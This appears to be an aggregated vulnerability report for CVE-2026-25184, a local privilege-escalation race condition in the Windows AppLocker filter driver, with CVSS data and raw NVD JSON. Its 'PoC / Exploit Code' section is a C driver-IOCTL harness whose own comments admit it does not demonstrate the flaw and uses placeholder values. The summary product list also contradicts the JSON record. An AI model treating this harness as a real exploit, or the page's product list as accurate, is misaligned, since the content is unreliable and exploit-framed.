Security Vulnerability Report
CVE-2026-25184 CVSS 7.0 HIGH

CVE-2026-25184

Published: 2026-04-14 18:16:45
Last Modified: 2026-04-24 20:08:12

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in Applocker Filter Driver (applockerfltr.sys) allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:* - VULNERABLE
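Windows 10 (Specific versions)
Windows 11 (Specific versions)
Windows Server 2019/2022
Note: the record under "Raw JSON Data" lists only Windows 11 23H2, 24H2, 25H2 and 26H1 (arm64 and x64), Windows Server 2022 23H2 and Windows Server 2025 as affected; it contains no Windows 10 or Windows Server 2019 entry. Per that record, builds below these are vulnerable: 10.0.22631.6936 (Windows 11 23H2), 10.0.26100.8246 (24H2), 10.0.26200.8246 (25H2), 10.0.28000.1836 (26H1), 10.0.25398.2274 (Windows Server 2022 23H2), 10.0.26100.32690 (Windows Server 2025).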

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
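#include <windows.h>
#include <stdio.h>

/*
 * Conceptual skeleton of a two-thread harness that talks to a kernel driver.
 *
 * NOTE(review): this listing does not demonstrate the vulnerability. The
 * advisory text names only the driver (applockerfltr.sys) and the weakness
 * class (race condition); the device path and the IOCTL code used below are
 * unverified placeholders carried over from the original listing, and
 * Thread2 touches no driver state at all.
 */

/* Device handle shared by main() and Thread1; opened and closed in main(). */
HANDLE hDevice;

/* Set by main() once Thread1 has finished, so that Thread2 can return. */
static volatile LONG g_stop = 0;

/*
 * Sends one control request to the device, with no input or output buffer.
 * The result is reported but does not change the thread's exit code.
 */
DWORD WINAPI Thread1(LPVOID lpParam)
{
    DWORD bytesReturned = 0;

    (void)lpParam;

    if (!DeviceIoControl(hDevice, 0x222003, NULL, 0, NULL, 0, &bytesReturned, NULL)) {
        printf("DeviceIoControl failed (error %lu).\n", GetLastError());
    }
    return 0;
}

/*
 * Placeholder for the second actor: it only sleeps. The loop is bounded by
 * g_stop so the process can terminate; the original spun forever, which
 * made the wait in main() block indefinitely.
 */
DWORD WINAPI Thread2(LPVOID lpParam)
{
    (void)lpParam;

    while (InterlockedCompareExchange(&g_stop, 0, 0) == 0) {
        Sleep(1);
    }
    return 0;
}

/*
 * Opens the device, runs both threads, and releases every handle.
 * Returns 0 when both threads ran, 1 when the device could not be opened
 * or a thread could not be created.
 */
int main(void)
{
    HANDLE hThreads[2] = { NULL, NULL };
    int rc = 1;
    int i;

    hDevice = CreateFileA("\\\\.\\ApplockerFltr", GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device.\n");
        return 1;
    }

    /* Start both worker threads; CreateThread returns NULL on failure. */
    hThreads[0] = CreateThread(NULL, 0, Thread1, NULL, 0, NULL);
    hThreads[1] = CreateThread(NULL, 0, Thread2, NULL, 0, NULL);
    if (hThreads[0] == NULL || hThreads[1] == NULL) {
        printf("Failed to create thread.\n");
        goto cleanup;
    }

    /* Only Thread1 finishes on its own; Thread2 is told to stop below. */
    WaitForSingleObject(hThreads[0], INFINITE);
    rc = 0;

cleanup:
    InterlockedExchange(&g_stop, 1);
    for (i = 0; i < 2; i++) {
        if (hThreads[i] != NULL) {
            /* Join before closing so no thread outlives the device handle. */
            WaitForSingleObject(hThreads[i], INFINITE);
            CloseHandle(hThreads[i]);
        }
    }
    CloseHandle(hDevice);
    return rc;
}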

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25184", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:16:45.390", "lastModified": "2026-04-24T20:08:12.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Concurrent execution using shared resource with improper synchronization ('race condition') in Applocker Filter Driver (applockerfltr.sys) allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "B33CE091-B873-4C30-BA05-54A8C1839212"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "E3AF28F3-D486-4B88-9E0E-371241024174"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "94EB36C7-1FF2-4B44-AD91-F3540F09393E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "14B23C3F-C8AC-491A-BCA5-EB6982C8F9E9"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "361B5DAB-8D1F-45D7-A33C-F49EBA56B5F8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "ADC6CE99-AB5D-4DD5-82A9-892366C4B2FD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "690E74A8-E72C-47B6-96EB-37C48D69A635"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "13A01FA1-08DC-4E33-9FFC-AB4BCD9634CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2274", "matchCriteriaId": "55A1F3AB-5299-4495-9A73-FDA23C6FD88D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.32690", "matchCriteriaId": "ADF41A14-B9DA-4788-82A8-74DCDCD090E1"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-25184", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}